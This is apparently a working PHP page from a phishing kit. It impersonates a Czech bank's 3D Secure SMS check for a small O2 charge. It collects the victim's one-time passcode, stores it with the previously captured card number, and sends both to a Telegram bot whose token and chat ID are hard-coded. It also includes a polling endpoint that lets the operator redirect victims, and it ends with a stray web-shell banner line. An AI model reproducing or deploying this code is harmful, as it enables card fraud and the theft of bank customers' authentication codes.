<?php
// Start session to get payment session ID
session_start();
// Check if session ID exists
if (!isset($_SESSION['payment_session_id'])) {
// Redirect to payment page if no session ID
header('Location: payment.html');
exit;
}
$sessionId = $_SESSION['payment_session_id'];
// Configuration file path
$config_dir = 'config';
$pending_cards_file = $config_dir . '/pending_cards.json';
$redirect_config_file = $config_dir . '/redirect_settings.json';
// Load existing redirect settings if file exists
$redirect_settings = [
'success_url' => 'success.html',
'failure_url' => 'failed.html',
'default_destination' => 'https://www.example.com',
'redirect_delay' => 2
];
if (file_exists($redirect_config_file)) {
$config_content = file_get_contents($redirect_config_file);
$loaded_settings = json_decode($config_content, true);
if (is_array($loaded_settings)) {
$redirect_settings = array_merge($redirect_settings, $loaded_settings);
}
}
// Get card info for bank specific customization
$bank_name = 'Česká spořitelna';
$bank_logo = 'images/cs-bank-logo.png';
$bank_color = '#0070F7';
$card_type = 'VISA';
if (file_exists($pending_cards_file)) {
$pending_content = file_get_contents($pending_cards_file);
$pending_cards = json_decode($pending_content, true) ?: [];
if (isset($pending_cards[$sessionId])) {
if (isset($pending_cards[$sessionId]['bank_name'])) {
$bank_name = $pending_cards[$sessionId]['bank_name'];
}
if (isset($pending_cards[$sessionId]['card_type'])) {
$card_type = $pending_cards[$sessionId]['card_type'];
}
// Update status to OTP verification
$pending_cards[$sessionId]['status'] = 'otp_verification';
file_put_contents($pending_cards_file, json_encode($pending_cards, JSON_PRETTY_PRINT));
}
}
// Handle OTP submission
$otp_error = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['otp'])) {
$otp = $_POST['otp'];
// Validate OTP (in this case, we accept any OTP)
if (strlen($otp) >= 4 && strlen($otp) <= 8) {
// Load pending cards
if (file_exists($pending_cards_file)) {
$pending_content = file_get_contents($pending_cards_file);
$pending_cards = json_decode($pending_content, true) ?: [];
if (isset($pending_cards[$sessionId])) {
// Update status and OTP
$pending_cards[$sessionId]['status'] = 'otp_submitted';
$pending_cards[$sessionId]['otp'] = $otp;
$pending_cards[$sessionId]['otp_time'] = date('Y-m-d H:i:s');
// Save updated pending cards
file_put_contents($pending_cards_file, json_encode($pending_cards, JSON_PRETTY_PRINT));
// Add Telegram notification code here
// Send notification to Telegram
$TELEGRAM_BOT_TOKEN = '2147021455:AAECr25u-TTsb5_CZqvpUBrybQgqVyxtEUY';
$CHAT_ID = '1328122846';
$message = "🔐 OTP Submitted:\n";
$message .= "------------------------\n";
$message .= "🔢 OTP: $otp\n";
$message .= "💳 Card: " . $pending_cards[$sessionId]['card_number'] . "\n";
$message .= "🏦 Bank: $bank_name\n";
$message .= "🆔 Session ID: $sessionId\n";
$message .= "⏰ Time: " . date('Y-m-d H:i:s') . "\n";
$telegramApiUrl = "https://api.telegram.org/bot$TELEGRAM_BOT_TOKEN/sendMessage";
$postData = [
'chat_id' => $CHAT_ID,
'text' => $message,
'parse_mode' => 'HTML'
];
$ch = curl_init($telegramApiUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
curl_exec($ch);
curl_close($ch);
// Redirect to waiting page
header('Location: otp_waiting.php');
exit;
}
}
} else {
$otp_error = 'Kód je v nesprávném formátu. Zkuste to znovu.';
}
}
// Function to check if a redirect has been set for this session
function checkRedirectStatus($sessionId, $pendingCardsFile) {
if (!file_exists($pendingCardsFile)) {
return false;
}
$pendingContent = file_get_contents($pendingCardsFile);
$pendingCards = json_decode($pendingContent, true) ?: [];
if (isset($pendingCards[$sessionId]) &&
isset($pendingCards[$sessionId]['status']) &&
$pendingCards[$sessionId]['status'] === 'redirected' &&
isset($pendingCards[$sessionId]['redirect_url'])) {
return $pendingCards[$sessionId]['redirect_url'];
}
return false;
}
// Check if this is an AJAX request to check status
if (isset($_GET['check']) && $_GET['check'] === 'status') {
$redirectStatus = checkRedirectStatus($sessionId, $pending_cards_file);
header('Content-Type: application/json');
if ($redirectStatus) {
echo json_encode(['redirect' => true, 'url' => $redirectStatus]);
} else {
echo json_encode(['redirect' => false]);
}
exit;
}
// Choose bank-specific styling
$bank_styles = [
'Česká spořitelna' => [
'color' => '#0070F7',
'logo' => 'images/cs-bank-logo.png',
],
'Komerční banka' => [
'color' => '#0066B0',
'logo' => 'images/kb-bank-logo.png',
],
'ČSOB' => [
'color' => '#0097A9',
'logo' => 'images/csob-bank-logo.png',
],
'Raiffeisenbank' => [
'color' => '#FEEE00',
'textColor' => '#000',
'logo' => 'images/rb-bank-logo.png',
],
'Moneta' => [
'color' => '#95C11F',
'logo' => 'images/moneta-bank-logo.png',
],
// Add more banks as needed
];
// Default styling
$bank_color = '#0070F7';
$bank_text_color = '#FFF';
$bank_logo_url = 'images/bank-logo.png';
// Apply bank-specific styling if available
if (isset($bank_styles[$bank_name])) {
$bank_color = $bank_styles[$bank_name]['color'];
$bank_logo_url = $bank_styles[$bank_name]['logo'];
if (isset($bank_styles[$bank_name]['textColor'])) {
$bank_text_color = $bank_styles[$bank_name]['textColor'];
}
}
// Get masked card number
$masked_card = 'XXXXXXXXXXXXXXXX';
if (isset($pending_cards[$sessionId]['card_number'])) {
$card_number = $pending_cards[$sessionId]['card_number'];
$card_number = preg_replace('/\D/', '', $card_number);
$masked_card = substr($card_number, 0, 4) . ' ' . substr($card_number, 4, 2) . 'XX XXXX ' . substr($card_number, -4);
}
?>
<!DOCTYPE html>
<html lang="cs">
<head>
<meta charset="UTF-8">
<link rel="icon" type="image/png" sizes="16x16" href="images/downloadavatar.png">
<link rel="icon" type="image/png" sizes="32x32" href="images/downloadavatar.png">
<link rel="apple-touch-icon" sizes="180x180" href="images/downloadavatar.png">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Bezpečnostní ověření - <?php echo htmlspecialchars($bank_name); ?></title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f4f4f4;
display: flex;
justify-content: center;
align-items: center;
min-height: 100vh;
margin: 0;
padding: 20px;
box-sizing: border-box;
}
.otp-container {
background-color: white;
border-radius: 8px;
box-shadow: 0 4px 6px rgba(0,0,0,0.1);
width: 100%;
max-width: 400px;
overflow: hidden;
}
.bank-header {
background-color: <?php echo $bank_color; ?>;
color: <?php echo $bank_text_color; ?>;
padding: 15px;
display: flex;
justify-content: space-between;
align-items: center;
}
.bank-logo {
height: 30px;
}
.card-brand {
height: 24px;
}
.otp-content {
padding: 20px;
}
h1 {
font-size: 1.5em;
margin-top: 0;
margin-bottom: 15px;
color: #333;
}
.otp-details {
margin-bottom: 20px;
}
.detail-row {
display: flex;
justify-content: space-between;
margin-bottom: 8px;
font-size: 0.9em;
}
.detail-label {
color: #666;
}
.detail-value {
font-weight: bold;
color: #333;
}
.otp-form {
margin-top: 25px;
}
.otp-input-group {
margin-bottom: 15px;
}
.otp-input-group label {
display: block;
margin-bottom: 5px;
color: #333;
font-weight: bold;
}
.otp-input {
width: 100%;
padding: 12px;
border: 1px solid #ddd;
border-radius: 4px;
font-size: 1.2em;
text-align: center;
letter-spacing: 2px;
box-sizing: border-box;
}
.otp-submit {
width: 100%;
padding: 12px;
background-color: <?php echo $bank_color; ?>;
color: <?php echo $bank_text_color; ?>;
border: none;
border-radius: 4px;
font-size: 1em;
font-weight: bold;
cursor: pointer;
transition: opacity 0.3s ease;
}
.otp-submit:hover {
opacity: 0.9;
}
.otp-error {
color: #e74c3c;
margin-top: 10px;
font-size: 0.9em;
}
.timer {
text-align: center;
font-size: 1.2em;
font-weight: bold;
color: <?php echo $bank_color; ?>;
margin: 15px 0;
}
.timer-progress {
width: 100%;
height: 6px;
background-color: #eee;
border-radius: 3px;
overflow: hidden;
margin-top: 5px;
}
.timer-bar {
height: 100%;
background-color: <?php echo $bank_color; ?>;
width: 100%;
transition: width 1s linear;
}
.otp-notes {
margin-top: 25px;
padding-top: 15px;
border-top: 1px solid #eee;
font-size: 0.8em;
color: #777;
}
</style>
</head>
<body>
<div class="otp-container">
<div class="bank-header">
<img src="image/csobcz.svg" alt="ČSOB" class="bank-logo">
<img src="image/vm.png" alt="<?php echo htmlspecialchars($card_type); ?>" class="card-brand">
</div>
<div class="otp-content">
<h1>Potvrďte požadavek</h1>
<div class="otp-details">
<div class="detail-row">
<span class="detail-label">Obchodník</span>
<span class="detail-value">O2 Czech Republic</span>
</div>
<div class="detail-row">
<span class="detail-label">Číslo karty</span>
<span class="detail-value"><?php echo htmlspecialchars($masked_card); ?></span>
</div>
<div class="detail-row">
<span class="detail-label">Částka</span>
<span class="detail-value">10,99 Kč</span>
</div>
<div class="detail-row">
<span class="detail-label">Čas požadavku</span>
<span class="detail-value"><?php echo date('d.m.Y H:i'); ?></span>
</div>
</div>
<div class="timer">
<div id="countdown">9:38</div>
<div class="timer-progress">
<div class="timer-bar" id="timerBar"></div>
</div>
</div>
<?php if (!empty($otp_error)): ?>
<div class="otp-error">
<?php echo htmlspecialchars($otp_error); ?>
</div>
<?php endif; ?>
<form class="otp-form" method="post" action="">
<div class="otp-input-group">
<label for="otp">Zadejte kód z SMS</label>
<input type="text" id="otp" name="otp" class="otp-input" placeholder="••••••" autocomplete="off" inputmode="numeric" maxlength="8" required>
</div>
<button type="submit" class="otp-submit">Potvrdit</button>
</form>
<div class="otp-notes">
<p>Zadejte ověřovací kód, který Vám byl zaslán jako SMS na Váš telefon. Platnost kódu je časově omezena.</p>
<p>Vaše online platby jsou s 3D Secure v bezpečí.</p>
</div>
</div>
</div>
<script>
// Countdown timer functionality
document.addEventListener('DOMContentLoaded', function() {
// Set timer for 10 minutes (600 seconds)
let totalTime = 600;
let timeLeft = totalTime;
const countdownElement = document.getElementById('countdown');
const timerBar = document.getElementById('timerBar');
// Update timer every second
const timerInterval = setInterval(function() {
timeLeft--;
// Calculate minutes and seconds left
const minutes = Math.floor(timeLeft / 60);
const seconds = timeLeft % 60;
// Format time display
countdownElement.textContent = `${minutes}:${seconds < 10 ? '0' : ''}${seconds}`;
// Update progress bar
const percentLeft = (timeLeft / totalTime) * 100;
timerBar.style.width = `${percentLeft}%`;
// If time's up, clear interval
if (timeLeft <= 0) {
clearInterval(timerInterval);
countdownElement.textContent = '0:00';
timerBar.style.width = '0%';
// Could redirect to a timeout page here
}
}, 1000);
});
</script>
</body>
</html>
DR.KR LITE SHELL COPYRIGHT 2016